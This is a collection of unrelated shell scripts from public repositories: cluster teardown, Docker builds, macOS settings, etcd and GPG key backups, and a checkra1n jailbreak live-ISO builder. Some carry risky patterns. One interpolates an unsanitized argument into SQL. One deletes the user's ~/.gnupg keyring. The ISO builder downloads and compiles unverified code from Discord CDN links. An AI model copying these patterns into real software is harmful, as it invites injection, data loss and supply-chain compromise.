${CLIENT_EXE} delete -n west-mesh-system -f ${BASE_URL}/${FTRAVELS}/west/west-ossm.yaml
${CLIENT_EXE} delete configmap east-ca-root-cert --from-file=root-cert.pem=east-cert.pem -n west-mesh-system
${CLIENT_EXE} delete configmap west-ca-root-cert --from-file=root-cert.pem=west-cert.pem -n east-mesh-system
${CLIENT_EXE} delete -n east-mesh-system -f ${BASE_URL}/${FTRAVELS}/east/east-federation.yaml
${CLIENT_EXE} delete -n west-mesh-system -f ${BASE_URL}/${FTRAVELS}/west/west-federation.yaml
${CLIENT_EXE} delete -n east-travel-agency -f ${BASE_URL}/${FTRAVELS}/east/east-travel-agency.yaml
${CLIENT_EXE} delete -n east-travel-portal -f ${BASE_URL}/${FTRAVELS}/east/east-travel-portal.yaml
${CLIENT_EXE} delete -n east-travel-control -f ${BASE_URL}/${FTRAVELS}/east/east-travel-control.yaml
${CLIENT_EXE} delete -n west-travel-agency -f ${BASE_URL}/${FTRAVELS}/west/west-travel-agency.yaml
declare -a arr=("east-mesh-system" "west-mesh-system" "east-travel-agency" "east-travel-portal" "east-travel-control" "west-travel-agency")
for i in "${arr[@]}"
do
if [ "${IS_OPENSHIFT}" == "true" ]; then
${CLIENT_EXE} delete project ${i}
else
${CLIENT_EXE} delete ns ${i} --ignore-not-found=true
fi
done
fi | true |
cf9d4112a0cf9ff7898916e69d7bb2ba2c406008 | Shell | kevinnguyenai/fusionpbx-docker-workshop | /build-freeswitch.sh | UTF-8 | 186 | 2.890625 | 3 | [] | no_license | #!/bin/bash
PLATFORM=$1
if [[ -z $1 ]]; then
PLATFORM=linux/arm/v7,linux/amd64
fi
pushd freeswitch
docker buildx build --platform ${PLATFORM} --push -t crazyquark/freeswitch .
popd | true |
d261c89313cfd4ffef1ceb95dbe2cbc45ff8d8bd | Shell | johndbritton/dotfiles | /preferences/macos/core | UTF-8 | 1,344 | 2.609375 | 3 | [] | no_license | #!/bin/zsh
set -e
# Set lock screen message
sudo defaults write /Library/Preferences/com.apple.loginwindow \
LoginwindowText \
"Found this computer? Please contact John Britton at public@johndbritton.com."
# Check for software updates daily
defaults write com.apple.SoftwareUpdate ScheduleFrequency -int 1
# Disable shadow in screenshots
defaults write com.apple.screencapture disable-shadow -bool true
# Save to disk (not to iCloud) by default
defaults write NSGlobalDomain NSDocumentSaveNewDocumentsToCloud -bool false
# Expand save panel by default
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode -bool true
defaults write NSGlobalDomain NSNavPanelExpandedStateForSaveMode2 -bool true
# Enable full keyboard access for all controls
# (e.g. enable Tab in modal dialogs)
defaults write NSGlobalDomain AppleKeyboardUIMode -int 3
# Use scroll gesture with the Ctrl (^) modifier key to zoom
sudo defaults write com.apple.universalaccess closeViewScrollWheelToggle -bool true
sudo defaults write com.apple.universalaccess HIDScrollZoomModifierMask -int 262144
# Follow the keyboard focus while zoomed in
sudo defaults write com.apple.universalaccess closeViewZoomFollowsFocus -bool true
# Disable user interface sound effects
defaults write com.apple.systemsound "com.apple.sound.uiaudio.enabled" -int 0
echo 'Configured Core preferences'
| true |
ad04c56f06c507ab29ca5afe0818362040a48b12 | Shell | iwcs15-hack/semantic-sounds | /code/every-pair.sh | UTF-8 | 212 | 2.625 | 3 | [] | no_license | #
# every-pair.sh, 17 Apr 15
file="$1"
IFS=","
while read w1 w2 n1 n2 n3 n4; do
echo -n "$w1,$w2,$n1,$n2,$n3,$n4,"
echo "$w1 $w2" | ../../sounds/slike.0.1.3/slike -gen phon | ./levdist
done < "$file"
| true |
4adc4a2ac5fb87894205db13d5a16411ac61c34e | Shell | giriraj789/ose-backup-restore | /scripts/backup_etcd.sh | UTF-8 | 474 | 3.109375 | 3 | [] | no_license | #!/bin/sh
set -e
# env variables you may want to change
BACKUPDIR=${BACKUPDIR:-"/ose_cluster_backup/etcd-data"}
hotdir="${BACKUPDIR}/hot/$(date +%Y%m%d%H%M).etcd"
mkdir -p $hotdir
. /etc/etcd/etcd.conf
echo "backuping the data directory to $hotdir"
etcdctl backup --data-dir ${ETCD_DATA_DIR} --backup-dir $hotdir
if [[ -e ${ETCD_DATA_DIR}/member/snap/db ]]; then
cp -a ${ETCD_DATA_DIR}/member/snap/db ${hotdir}/member/snap/
fi
echo
du -ksh $hotdir
find $hotdir
| true |
74403ab2cf3a250cbae17fbebd85128ad4032ff8 | Shell | raspberryenvoie/odysseyn1x | /build.sh | UTF-8 | 8,741 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Made with <3 by raspberryenvoie
# odysseyn1x build script (a fork of asineth/checkn1x)
# Exit if user isn't root
[ "$(id -u)" -ne 0 ] && {
echo 'Please run as root'
exit 1
}
# Change these variables to modify the version of checkra1n
CHECKRA1N_AMD64='https://assets.checkra.in/downloads/linux/cli/x86_64/dac9968939ea6e6bfbdedeb41d7e2579c4711dc2c5083f91dced66ca397dc51d/checkra1n'
CHECKRA1N_I686='https://assets.checkra.in/downloads/linux/cli/i486/77779d897bf06021824de50f08497a76878c6d9e35db7a9c82545506ceae217e/checkra1n'
GREEN="$(tput setaf 2)"
BLUE="$(tput setaf 6)"
NORMAL="$(tput sgr0)"
cat << EOF
${GREEN}############################################${NORMAL}
${GREEN}# #${NORMAL}
${GREEN}# ${BLUE}Welcome to the odysseyn1x build script ${GREEN}#${NORMAL}
${GREEN}# #${NORMAL}
${GREEN}############################################${NORMAL}
EOF
# Ask for the version and architecture if variables are empty
while [ -z "$VERSION" ]; do
printf 'Version: '
read -r VERSION
done
until [ "$ARCH" = 'amd64' ] || [ "$ARCH" = 'i686' ]; do
echo '1 amd64'
echo '2 i686'
printf 'Which architecture? amd64 (default) or i686 '
read -r input_arch
[ "$input_arch" = 1 ] && ARCH='amd64'
[ "$input_arch" = 2 ] && ARCH='i686'
[ -z "$input_arch" ] && ARCH='amd64'
done
# Delete old build
{
umount work/chroot/proc
umount work/chroot/sys
umount work/chroot/dev
} > /dev/null 2>&1
rm -rf work/
set -e -u -v
start_time="$(date -u +%s)"
# Install dependencies to build odysseyn1x
apt-get update
apt-get install -y --no-install-recommends wget debootstrap grub-pc-bin \
grub-efi-amd64-bin mtools squashfs-tools xorriso ca-certificates curl \
libusb-1.0-0-dev gcc make gzip xz-utils unzip libc6-dev
if [ "$ARCH" = 'amd64' ]; then
REPO_ARCH='amd64' # Debian's 64-bit repos are "amd64"
KERNEL_ARCH='amd64' # Debian's 32-bit kernels are suffixed "amd64"
else
# Install depencies to build odysseyn1x for i686
dpkg --add-architecture i386
apt-get update
apt install -y --no-install-recommends libusb-1.0-0-dev:i386 gcc-multilib
REPO_ARCH='i386' # Debian's 32-bit repos are "i386"
KERNEL_ARCH='686' # Debian's 32-bit kernels are suffixed "-686"
fi
# Configure the base system
mkdir -p work/chroot work/iso/live work/iso/boot/grub
debootstrap --variant=minbase --arch="$REPO_ARCH" stable work/chroot 'http://mirror.xtom.com.hk/debian/'
mount --bind /proc work/chroot/proc
mount --bind /sys work/chroot/sys
mount --bind /dev work/chroot/dev
cp /etc/resolv.conf work/chroot/etc
cat << EOF | chroot work/chroot /bin/bash
# Set debian frontend to noninteractive
export DEBIAN_FRONTEND=noninteractive
# Install requiered packages
apt-get install -y --no-install-recommends linux-image-$KERNEL_ARCH live-boot \
systemd systemd-sysv usbmuxd libusbmuxd-tools openssh-client sshpass xz-utils whiptail
# Remove apt as it won't be usable anymore
apt purge apt -y --allow-remove-essential
EOF
# Change initramfs compression to xz
sed -i 's/COMPRESS=gzip/COMPRESS=xz/' work/chroot/etc/initramfs-tools/initramfs.conf
chroot work/chroot update-initramfs -u
(
cd work/chroot
# Empty some directories to make the system smaller
rm -f etc/mtab \
etc/fstab \
etc/ssh/ssh_host* \
root/.wget-hsts \
root/.bash_history
rm -rf var/log/* \
var/cache/* \
var/backups/* \
var/lib/apt/* \
var/lib/dpkg/* \
usr/share/doc/* \
usr/share/man/* \
usr/share/info/* \
usr/share/icons/* \
usr/share/locale/* \
usr/share/zoneinfo/* \
usr/lib/modules/*
)
# Copy scripts
cp scripts/* work/chroot/usr/bin/
# Download resources for odysseyra1n
mkdir -p work/chroot/root/odysseyra1n/
(
cd work/chroot/root/odysseyra1n/
curl -sL -O https://github.com/coolstar/Odyssey-bootstrap/raw/master/bootstrap_1500.tar.gz \
-O https://github.com/coolstar/Odyssey-bootstrap/raw/master/bootstrap_1600.tar.gz \
-O https://github.com/coolstar/Odyssey-bootstrap/raw/master/bootstrap_1700.tar.gz \
-O https://github.com/coolstar/Odyssey-bootstrap/raw/master/org.coolstar.sileo_2.3_iphoneos-arm.deb \
-O https://github.com/coolstar/Odyssey-bootstrap/raw/master/org.swift.libswift_5.0-electra2_iphoneos-arm.deb
# Change compression format to xz
gzip -dv ./*.tar.gz
xz -v9e -T0 ./*.tar
)
(
cd work/chroot/root/
# Download resources for Android Sandcastle
curl -L -O 'https://assets.checkra.in/downloads/sandcastle/dff60656db1bdc6a250d3766813aa55c5e18510694bc64feaabff88876162f3f/android-sandcastle.zip'
unzip android-sandcastle.zip
rm -f android-sandcastle.zip
(
cd android-sandcastle/
rm -f iproxy ./*.dylib load-linux.mac ./*.sh README.txt
)
# Download resources for Linux Sandcastle
curl -L -O 'https://assets.checkra.in/downloads/sandcastle/0175ae56bcba314268d786d1239535bca245a7b126d62a767e12de48fd20f470/linux-sandcastle.zip'
unzip linux-sandcastle.zip
rm -f linux-sandcastle.zip
(
cd linux-sandcastle/
rm -f load-linux.mac README.txt
)
)
(
cd work/chroot/usr/bin/
curl -L -O 'https://raw.githubusercontent.com/corellium/projectsandcastle/master/loader/load-linux.c'
# Build load-linux.c and download checkra1n for the corresponding architecture
if [ "$ARCH" = 'amd64' ]; then
gcc load-linux.c -o load-linux -lusb-1.0
curl -L -o checkra1n "$CHECKRA1N_AMD64"
else
gcc -m32 load-linux.c -o load-linux -lusb-1.0
curl -L -o checkra1n "$CHECKRA1N_I686"
fi
rm -f load-linux.c
chmod +x load-linux checkra1n
)
# Configure linux-apple
(
cd work/chroot/usr/bin
# Build pongoterm.c for the corresponding architecture
# load-linux.c does not work as there is no baked in initramfs
curl -L -O https://github.com/konradybcio/pongoOS/raw/master/scripts/pongoterm.c
if [ "$ARCH" = 'amd64' ]; then
gcc -Wall -Wextra -Os -m64 pongoterm.c -DUSE_LIBUSB=1 -o pongoterm -lusb-1.0 -lpthread
else
gcc -Wall -Wextra -Os -m32 pongoterm.c -DUSE_LIBUSB=1 -o pongoterm -lusb-1.0 -lpthread
fi
rm -f pongoterm.c
)
# Download resources for linux-apple
(
cd work/chroot/root
mkdir linux-apple
cd linux-apple
# Download DeviceTree, 4K, 16K kernels and initramfs.
curl -L -OOOOO \
https://cdn.discordapp.com/attachments/672628720497852459/1023930400365625344/netboot_debug_initrd.img \
https://cdn.discordapp.com/attachments/672628720497852459/1024873433567350794/dtbpack \
https://cdn.discordapp.com/attachments/672628720497852459/1024873433982578718/Image.lzma-16k \
https://cdn.discordapp.com/attachments/672628720497852459/1024873434334892063/Image.lzma-4k \
https://cdn.discordapp.com/attachments/672628720497852459/1025036488414593085/Pongo.bin
)
# Download A8X/A9X resources
(
cd work/chroot/root
curl -L -O https://cdn.discordapp.com/attachments/672628720497852459/1025048286916251668/PongoConsolidated.bin
)
# Configure autologin
mkdir -p work/chroot/etc/systemd/system/getty@tty1.service.d
cat << EOF > work/chroot/etc/systemd/system/getty@tty1.service.d/override.conf
[Service]
ExecStart=
ExecStart=-/sbin/agetty --noissue --autologin root %I
Type=idle
EOF
# Configure grub
cat << "EOF" > work/iso/boot/grub/grub.cfg
insmod all_video
echo ''
echo ' ___ __| |_ _ ___ ___ ___ _ _ _ __ / |_ __'
echo ' / _ \ / _` | | | / __/ __|/ _ \ | | | `_ \| \ \/ /'
echo '| (_) | (_| | |_| \__ \__ \ __/ |_| | | | | |> < '
echo ' \___/ \__,_|\__, |___/___/\___|\__, |_| |_|_/_/\_\'
echo ' |___/ |___/ '
echo ''
echo ' Made with <3 by raspberryenvoie'
linux /boot/vmlinuz boot=live quiet
initrd /boot/initrd.img
boot
EOF
# Change hostname and configure .bashrc
echo 'odysseyn1x' > work/chroot/etc/hostname
echo "export ODYSSEYN1X_VERSION='$VERSION'" > work/chroot/root/.bashrc
echo '/usr/bin/odysseyn1x_menu' >> work/chroot/root/.bashrc
rm -f work/chroot/etc/resolv.conf
# Build the ISO
umount work/chroot/proc
umount work/chroot/sys
umount work/chroot/dev
cp work/chroot/vmlinuz work/iso/boot
cp work/chroot/initrd.img work/iso/boot
mksquashfs work/chroot work/iso/live/filesystem.squashfs -noappend -e boot -comp xz -Xbcj x86
grub-mkrescue -o "odysseyn1x-$VERSION-$ARCH.iso" work/iso \
--compress=xz \
--fonts='' \
--locales='' \
--themes=''
end_time="$(date -u +%s)"
elapsed_time="$((end_time - start_time))"
echo "Built odysseyn1x-$VERSION-$ARCH in $((elapsed_time / 60)) minutes and $((elapsed_time % 60)) seconds."
| true |
cb9bfd43a0c83aff1ebfb7f5325b37f85d0c1a30 | Shell | dmc-uilabs/dmcacons | /deleteWorkspace.sh | UTF-8 | 564 | 3.734375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
DisplayUsage() {
cat << EOM
USAGE:
Enter the id of the workspace you wish to delete.
./deleteWorkspace.sh some_id
EOM
exit 1
}1
#
# Minimum args
#
if [ $# -lt 1 ]
then
DisplayUsage
fi
id="$1"
# user=$(psql -U postgres -d gforge -c "UPDATE groups SET use_webdav='0' WHERE group_id='$id';")
user=$(psql -U postgres -d gforge -c "UPDATE groups SET use_webdav='0' WHERE group_id='$id';")
echo $user
if [[ $user == *"(1 rows)"* ]]
then
echo "Soft Deleted the workspace with id='$id'";
else
echo "Something went wrong call the ghost busters"
fi
| true |
45f724d43eae68ad2bbf34fd31545df3aeee5a12 | Shell | SwarmKit/dockerfiles | /emby/build.sh | UTF-8 | 1,517 | 4.09375 | 4 | [] | no_license | #!/bin/bash
FOLDER=$(dirname $0)
DOCKER_PUSH=$1
CSI="\033["
CEND="${CSI}0m"
CRED="${CSI}1;31m"
CGREEN="${CSI}1;32m"
CYELLOW="${CSI}1;33m"
CBLUE="${CSI}1;34m"
# Download dependencies
docker pull xataz/alpine:3.4
build() {
image_name=$1
image_dir=$2
echo -e "${CBUILD}Build ${image_name} on ${image_dir}${CEND}"
docker build -t ${image_name} ${image_dir}
if [ $? == 0 ]; then
echo -e "${CGREEN} --- "
echo -e "Successfully built ${image_name} with context ${image_dir}"
echo -e " --- ${CEND}"
else
echo -e "${CRED} --- "
echo -e "Failed built ${USER}/${image_name} with context ${image_dir}"
echo -e " --- ${CEND}"
exit 1
fi
}
push() {
image_name=$1
if [ "$DOCKER_PUSH" == "push" ]; then
echo -e "${CYELLOW}Push ${image_name}${CEND}"
docker push ${image_name}
echo -e "${CYELLOW} --- "
echo -e "Successfully push ${image_name}"
echo -e " --- ${CEND}"
fi
}
# Build emby
## Latest
for tag in $(grep 'tags=' $FOLDER/Dockerfile | cut -d'"' -f2); do
build "xataz/emby:$tag" "$FOLDER"
if [ $? == 0 ]; then
push "xataz/emby:$tag"
fi
done | true |
c40f9b94a93434f4ee6c365abb48cab1e8d4a622 | Shell | jimjdeal/Arma-3-Scripts | /_makeNewServer | UTF-8 | 928 | 3.890625 | 4 | [] | no_license | #!/bin/bash
folderName=$1
if [ ! -n "$folderName" ]; then
echo Hello! What would you want the new directory to be called?
fi
while [ ! -n "$folderName" ]; do
if [ ! -n "$folderName" ]; then
read folderName
folderName=`echo $folderName | tr ' ' '_'`
if [ ! -n "$folderName" ]; then
echo New folder Name can not be empty!
fi
fi
done
echo Making directory...
mkdir $folderName
echo Making symbolic links for $folderName
ln -sr "./A3Master/"* "./$folderName/"
echo Removing keys, logs, and mpmissions
for removeThese in logs keys mpmissions; do
rm "./$folderName/$removeThese"
done
echo Making keys, logs and mpmissions as actual folders
for removeThese in logs keys mpmissions; do
mkdir "./$folderName/$removeThese"
done
echo Copying main files from _A3Files...
cp "./_A3Files/"* "./$folderName/" -r
echo Making mods.txt
touch $folderName/mods.txt
echo Good Luck | true |
5e6ae832788d1de2e3ead8aae18726858577346e | Shell | JadLevesque/order-pp | /test/Test-shell | ISO-8859-1 | 8,764 | 3.859375 | 4 | [
"BSL-1.0"
] | permissive | #!/bin/bash
# (C) Copyright Vesa Karvonen 2004.
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE.)
set -e
TIMEFORMAT='Time: %R seconds'
dbFile=test.db
tmpFile=.test.tmp
debugFlag=1
function check-and-add-preprocessor {
if $1 >& /dev/null ; then
availablePreprocessors="[$2] $availablePreprocessors"
fi
}
if ! test -f .preprocessor ; then
availablePreprocessors=''
check-and-add-preprocessor "cpp --help" cpp
check-and-add-preprocessor "wave -v" wave
read -e -p "Choose preprocessor: $availablePreprocessors? "
if test "$(echo "$availablePreprocessors" | grep "\\[$REPLY\\]")" != "$availablePreprocessors" ; then
echo "
Sorry, \"$REPLY\" isn't one of the preprocessors:
$availablePreprocessors
If you wish to use another preprocessor, you need to customize this
script for the preprocessor, because there is no standard on the
command line options accepted by a preprocessor."
exit 1
fi
echo "$REPLY" > .preprocessor
echo "Wrote $REPLY to the .preprocessor file."
fi
preprocessor=$(cat .preprocessor)
function eval-in-cpp {
cpp -P \
-std=c99 \
-Wall \
-pedantic-errors \
$(if test $debugFlag = 1 ; then echo '-DORDER_PP_DEBUG' ; fi) \
-I "../inc/" \
-I "../../chaos-pp/" \
-include "../inc/order/interpreter.h" \
-include "test-defs.h"
}
function eval-in-wave {
wave --variadics \
$(if test $debugFlag = 1 ; then echo '--define ORDER_PP_DEBUG' ; fi) \
--include "../inc/" \
--include "../../chaos-pp/" \
--forceinclude "order/interpreter.h" \
--forceinclude "test-defs.h"
}
function eval-in {
eval-in-$preprocessor
}
function spacify {
sed -e 's|,| , |g' \
-e 's|(| ( |g' \
-e 's|)| ) |g' \
-e 's| \+| |g'
}
function sed-from {
local tmp="$1"
shift 1
echo "$tmp" | sed "$@"
}
function test-cnt {
cat $dbFile | wc -l | sed 's# ##g'
}
function get-line {
head -n $(($1+1)) | tail -n1
}
function get-line-from {
echo "$2" | get-line $1
}
function get-test {
cat $dbFile | get-line $1
}
function add-test {
echo "$1#$2#$3" >> $dbFile
clean-test-db
}
function clean-test-db {
local tmp="$(cat $dbFile)"
echo "$tmp" | sort | uniq > $dbFile
}
function remove-test {
local lines=$(test-cnt)
local before=$(head -n $1 $dbFile)
local after=$(tail -n $(($lines-1-$1)) $dbFile)
echo -n > $dbFile
if test "$before" != "" ; then echo "$before" >> $dbFile ; fi
if test "$after" != "" ; then echo "$after" >> $dbFile ; fi
}
function replace-test {
local lines=$(test-cnt)
local before=$(head -n $1 $dbFile)
local after=$(tail -n $(($lines-1-$1)) $dbFile)
echo -n > $dbFile
if test "$before" != "" ; then echo "$before" >> $dbFile ; fi
add-test "$2" "$3" "$4"
if test "$after" != "" ; then echo "$after" >> $dbFile ; fi
}
function preprocess-positive-tests {
sed -e 's|^.*#.*#O.*$||g' \
-e 's|#.*||g' \
-e 's|^\(.\+\)$|ORDER_PP(\1)|g' \
$dbFile | \
spacify | \
eval-in | \
tail -n $(test-cnt)
}
function differing-lines {
echo "$1" | \
nl -s '#' -v 0 | \
grep -v -e "^\\($(echo -n "$2" | sed 's#\([^a-zA-Z0-9()?+|{, ]\)#\\\1#g' | nl -s '#' -v 0 | tr "\n" '$' | sed 's#\$#\\\|#g')\\)\$" | \
sed -e 's|#.*||g' -e 's|[ \t]||g' | tr "\n" ' '
}
function run-tests {
echo "Total of $(test-cnt) tests."
echo "Running positive tests..."
local allTerm=$(sed -e 's|#.*||g' $dbFile)
local allExpected=$(sed -e 's|^[^#]*#||g' -e 's|#.*$||g' $dbFile)
local allErrors=$(sed -e 's|.*#||g' $dbFile)
local posActual=$(preprocess-positive-tests)
local posExpected=$(sed -e 's|^.*#.*#O.*$||g' -e 's|^[^#]*#||g' -e 's|#.*$||g' $dbFile)
echo "Comparing results..."
for i in $(differing-lines "$posActual" "$posExpected") ; do
term=$(get-line-from $i "$allTerm")
local result=$(get-line-from $i "$posActual")
local expected=$(get-line-from $i "$posExpected")
echo "Term: $term"
echo "Expected: $expected"
echo "Result: $result"
read -e -n 1 -p "[(U)se result | (R)emove test| Skip]? "
case "$REPLY" in
("u"|"U")
echo "Using result"
replace-test $i "$term" "$result" "" ;;
("r"|"R")
echo "Removing test"
remove-test $i ;;
(*)
echo "Skipping" ;;
esac
done
echo "Running and comparing negative tests..."
local oldDebugFlag=$debugFlag
debugFlag=1
for i in $(differing-lines "$(sed -e 's|.*#.*#O.*|\$|g' -e 's|[^$]\+|#|g' $dbFile)" "$(sed -e 's|.\+|#|g' $dbFile)") ; do
term=$(get-line-from $i "$allTerm")
local expectedResult=$(get-line-from $i "$allExpected")
local expectedErrors=$(get-line-from $i "$allErrors")
do-eval
if test "$result#$errors" != "$expectedResult#$expectedErrors" ; then
echo "Term: $term"
echo "Expected result: $expectedResult"
echo "Actual result: $result"
echo "Expected error: $expectedErrors"
echo "Actual error: $errors"
read -e -n 1 -p "[(U)se result | (R)emove test| Skip]? "
case "$REPLY" in
("u"|"U")
echo "Using result"
replace-test $i "$term" "$result" "$errors" ;;
("r"|"R")
echo "Removing test"
remove-test $i ;;
(*)
echo "Skipping" ;;
esac
fi
done
debugFlag=$oldDebugFlag
}
function do-eval {
result=$(echo "ORDER_PP($term)" | spacify | eval-in 2>"$tmpFile" | tail -n1)
resultChars=$(echo "$result" | wc -m | sed 's# ##g')
resultLines=$(echo "$result" | wc -l | sed 's# ##g')
messages="$(cat "$tmpFile")"
if test -n "$messages" ; then
errors=$(echo "$messages" | grep -o 'ORDER_PP_[a-zA-Z0-9_]\+' | sort | uniq | tr $'\n' ' ' | sed 's# $##g')
else
errors=""
fi
}
function interactive-eval {
read -e -p "Term: "
if test "$REPLY" != "" ; then
term="$REPLY"
else
echo "Term: $term"
fi
time do-eval
if test -n "$messages" ; then
echo "Errors: $errors"
echo
echo "$messages"
echo
fi
if test $(($COLUMNS-9)) -lt $resultChars ; then
echo "The output contains $resultChars characters on $resultLines lines!"
read -e -n 1 -p "[(S)kip | (L)ess | Display]? "
case "$REPLY" in
("l"|"L")
echo "Result: $result" | less ;;
("s"|"S")
echo "Skipping" ;;
(*)
echo "Result: $result" ;;
esac
else
echo "Result: $result"
fi
}
function interactive-trace {
read -e -p "Term: "
if test "$REPLY" != "" ; then
term="$REPLY"
else
echo "Term: $term"
fi
local steps=0
result=$(echo "(,,ORDER_PP_DEF($(echo "$term" | spacify)),8EXIT,)" | eval-in)
echo ": $result"
while read -e -n 1 -p "[(#$steps) | Enter to step]? " ; do
if test "$REPLY" != "" ; then
break
fi
steps=$(($steps+1))
result=$(echo "ORDER_PP_CM_DN_0 $result" | eval-in)
echo ": $result"
if ! echo "$result" | grep -q '^(' ; then
echo "[ Program stopped. ]"
break
fi
done
}
function interactive-add-test {
interactive-eval
read -e -n 1 -p "Add [(N)o | Yes]? "
case "$REPLY" in
("n"|"N")
echo "Not added.";;
(*)
add-test "$term" "$result" "$errors"
echo "Added." ;;
esac
}
echo "Database: $dbFile"
if ! cp -r $dbFile $dbFile.bak ; then
echo "Backup failed. Terminating."
exit
else
echo "Backed up database to: $dbFile.bak"
fi
# IFS=''
REPLY=''
while true ; do
if test -z "$REPLY" ; then
if test "$#" -gt 0 ; then
REPLY="$(echo "$1" | sed 's#^-*##g')"
shift
else
read -e -n 1 -p "[(A)dd | (C)lean | (D)ebug | (M)ode: $debugFlag | (Q)uit | (S)how | (T)est | Eval]? "
fi
fi
case "$REPLY" in
(a*|A)
interactive-add-test ;;
(t*|T)
time run-tests ;;
(s*|S)
less $dbFile ;;
(c*|C)
clean-test-db ;;
(q*|Q)
exit ;;
(d*|D)
interactive-trace ;;
(m*|M)
debugFlag=$((1-debugFlag)) ;;
(*)
interactive-eval
REPLY="" ;;
esac
REPLY="$(echo "$REPLY" | sed 's#^.##g')"
done
| true |
d514b8f1d7aaa10e11bf16727e3d66d2e409c562 | Shell | kpu/elrc-scrape | /download_json.sh | UTF-8 | 159 | 2.609375 | 3 | [
"LicenseRef-scancode-public-domain"
] | permissive | #!/bin/bash
for ((i=0;i<5000;++i)); do if [ ! -s $i.json ]; then echo wget -O $i.json https://www.elrc-share.eu/repository/export_json/$i/; fi; done |parallel
| true |
527cec01c65452f5d78cbb8d6cd32c33adc522c8 | Shell | lucionardelli/dotfiles | /touchpad.sh | UTF-8 | 1,306 | 4.28125 | 4 | [] | no_license | #!/bin/bash -e
for i in "$@"
do
case $i in
-e|--enable)
ENABLE=1
shift # past argument with no value
;;
-d|--disable)
DISABLE=1
shift # past argument with no value
;;
-s=*|--sleep=*)
SLEEP_S="${i#*=}"
shift # past argument=value
;;
-h|--help)
HELP=1
shift # past argument with no value
;;
*)
# unknown option
echo "Unknown option $i"
exit
;;
esac
done
if [[ -n $HELP ]]; then
echo
echo "Enable (-e|--enable) or disable (-d|--disable) touchpad."
echo "Examples"
echo "\tSleep 10 secs, then enable:"
echo "\t\t$0 --enable --sleep=10"
echo
echo "\tDisable:"
echo "\t\t$0 --disable"
echo
exit
fi
if [[ -z $ENABLE ]] && [[ -z $DISABLE ]]; then
echo "Missing command, either enable or disable. aborting..."
exit
else
TOUCHPAD=`xinput --list --name-only | grep -i touch` || true
if [[ -z $TOUCHPAD ]]; then
echo "Couldn't get Touchpad version. Try running xinput and manually editing this file"
exit 1
fi
if [[ -n $SLEEP_S ]]; then
sleep $SLEEP_S
fi
if [[ -n $ENABLE ]]; then
xinput set-prop "$TOUCHPAD" "Device Enabled" 1
else
xinput set-prop "$TOUCHPAD" "Device Enabled" 0
fi
fi
echo "Success!"
exit 0
| true |
a94f51e44309e1252e40c1b9eb55f0ba72ae200b | Shell | rsmitty/yubikey | /gpg.sh | UTF-8 | 1,790 | 3.625 | 4 | [] | no_license | #!/bin/bash
set -eou pipefail
while true; do
read -p "Enter Name: " name
echo
read -p "Enter Email: " email
echo
[[ ! -z "$name" ]] && break || echo "Name is empty string"
echo
[[ ! -z "$email" ]] && break || echo "Email is empty string"
echo
done
echo 'User info confirmed'
mkdir ~/gpg
# Generate master key
gpg --quick-gen-key "$name <$email>" ed25519 sign 365d
export KEYID=$(gpg --list-keys --with-colons $email | grep "^pub:" | cut -d: -f5)
export FPR=$(gpg --list-keys --with-colons $email | grep "^fpr:" | cut -d: -f10)
# Generate subkeys
gpg --quick-add-key $FPR cv25519 encr 365d
gpg --quick-add-key $FPR ed25519 auth 365d
gpg --quick-add-key $FPR ed25519 sign 365d
# Generate revocation certificate
gpg --generate-revocation --output ~/gpg/$FPR.revoke.asc $FPR
# Configure GPG
echo "default-key $FPR" >~/gpg/gpg.conf
# Test
export GPG_TTY=$(tty)
echo 'test' | gpg --clearsign --default-key $email
# Backup
gpg --armor --export-secret-keys $FPR > ~/gpg/$FPR.master.asc
gpg --armor --export-secret-subkeys $FPR > ~/gpg/$FPR.subkeys.asc
gpg --armor --export $FPR > ~/gpg/$FPR.pub.asc
gpg --export-ssh-key $FPR > ~/gpg/$FPR.ssh
tar -czpf ~/gpg/gnupg.tgz ~/.gnupg/
# Test
rm -rf ~/.gnupg/
mkdir ~/.gnupg/
chmod 700 ~/.gnupg/
cp ~/gpg/gpg.conf ~/.gnupg/
gpg --import ~/gpg/$FPR.master.asc ~/gpg/$FPR.subkeys.asc
echo
echo '#############################################'
echo 'All keys have been successfully generated!'
echo 'Proceed with the following:'
echo
echo 'Copy ~/gpg to a secure offline storage device'
echo
echo 'Copy the following to a secondary storage device to'
echo 'be transfered to a workstation:'
echo " - ~/gpg/gpg.conf"
echo " - ~/gpg/$FPR.pub.asc"
echo " - ~/gpg/$FPR.ssh"
echo '#############################################'
| true |
83bb22b8779dcb5da4fedad3a716c39cc559e063 | Shell | SNH48Live/KVM48 | /ci/script | UTF-8 | 2,445 | 3.34375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
set -e
[[ $PYTHON_VERSION == 3.* ]] || { echo "[ERROR] Invalid PYTHON_VERSION $PYTHON_VERSION" >&2; exit 1; }
mkdir -p data
cat > data/kvm48-config.yml <<'EOF'
group_id: 10
names:
- 陈观慧
- 陈思
- 戴萌
- 孔肖吟
- 李宇琪
- 莫寒
- 钱蓓婷
- 邱欣怡
- 吴哲晗
- 徐晨辰
- 许佳琪
- 张语格
span: 3
directory: /data
named_subdirs: true
update_checks: off
editor: cat
perf:
span: 7
EOF
image="snh48live/kvm48:master-python-$PYTHON_VERSION"
test_run() {
blue=$'\e[34m'
yellow=$'\e[33m'
red=$'\e[31m'
reset=$'\e[0m'
for try in {1..3}; do
echo -E "${blue}> kvm48 $@${reset}" >&2
sudo docker run -it --rm -v "$PWD/data:/data" "$image" "$@" || {
if [[ $try != 3 ]]; then
echo -E "${yellow}kvm48 $@ failed but it may be a temporary network issue; retrying in 30 seconds...${reset}" >&2
sleep 30
continue
else
if [[ -e data/m3u8.txt ]]; then
echo "${yellow}Testing reachability of remaining URLs in data/m3u8.txt...${reset}" >&2
m3u8s_are_broken=1
cut -f1 data/m3u8.txt | while read url; do
if curl -fI -m 10 $url; then
echo "${yellow}$url is fine${reset}" >&2
m3u8s_are_broken=0
fi
done
if (( m3u8s_are_broken )); then
echo "${yellow}Remaining M3U8 URLs are broken, not KVM48's fault.${reset}" >&2
return 0
fi
fi
echo -E "${red}kvm48 $@ failed after 3 tries${reset}" >&2
exit 1
fi
}
break
done
}
test_run --debug --config data/kvm48-config.yml
sudo rm -f data/*/*.mp4
# Test a known date range with both mp4 and m3u8 URLs to download.
test_run --debug --config data/kvm48-config.yml --from 2018-10-25 --to 2018-10-27
sudo rm -f data/*/*.mp4
